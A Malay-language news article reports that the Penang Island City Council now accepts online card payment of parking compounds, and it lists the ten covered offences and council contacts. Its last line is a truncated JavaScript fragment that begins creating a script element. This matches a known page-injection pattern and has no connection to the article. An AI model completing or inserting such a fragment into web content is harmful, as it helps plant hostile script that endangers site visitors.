Bayaran PTK, kompaun MBPP kini secara online

GEORGE TOWN – Orang ramai kini boleh membuat pembayaran secara atas talian (online) bagi kes Pemberitahuan Tentang Kesalahan (PTK) atau kompaun kesalahan letak kereta Majlis Bandaraya Pulau Pinang (MBPP).

Perkara tersebut diumumkan Ahli Majlisnya merangkap Pengerusi Jawatankuasa Pengurusan Kewangan, Joseph Ng Soon Siang pada sidang media di sini baru-baru ini.

Beliau berkata, pembayaran secara atas talian hanya melibatkan PTK atau kompaun dikeluarkan bermula 2 Januari 2014 oleh MBPP di bawah Perintah Pengangkutan Jalan (Tempat Letak Kereta) Majlis Perbandaran Pulau Pinang 2014.

“PTK atau kompuan ini tertakluk kepada 10 kesalahan yang telah digariskan.

“Iaitu kesalahan meletak kenderaan di luar petak; kesalahan petak letak kereta; mengalih kompaun dari kenderaan; meletak kenderaan di dalam petak OKU atau petak khas dan kesalahan tidak mematuhi papan tanda atau isyarat lalulintas.

“Turut tersenarai, kesalahan meletak kenderaan atau halangan di atas siar kaki awam; tidak mempamerkan kupon; kesalahan melibatkan kupon; kesalahan melibatkan alat peraga berelektronik dan kesalahan pas premium,” jelasnya.

Hadir sama, Ahli Majlis MBPP, Syerleena Abdul Rashid.

Mengulas lanjut, Soon Siang memberitahu bahawa MBPP kini dalam usaha menyediakan pelbagai platform bagi memudahkan orang ramai berurusan dengan pihak Majlis.

“Kita ingin jadikan perkhidmatan yang disediakan MBPP bersifat mesra pengguna terutamanya dalam memudahcara orang awam membayar bil dan kompaun.

“Pihak MBPP telahpun melaksanakan Mesin Auto Kiosk iaitu mesin pembayaran mudah alih dan Van Kaunter Bergerak, semuanya adalah untuk kemudahan orang awam,” jelasnya.

Pembayaran boleh dibuat menggunakan kad kredit ataupun kad debit menerusi laman sesawang rasmi MBPP, www.mbpp.gov.my.

Sebarang pertanyaan lanjut, sila berhubung dengan Che Som Darus dari Unit Kompaun MBPP di talian 04 – 259 2242 atau Rohaya Mohd. Rashid dari Unit Aduan, Jabatan Perbendaharaan MBPP (04 – 259 2058).

var d=document;var s=d.createElement(‘script’);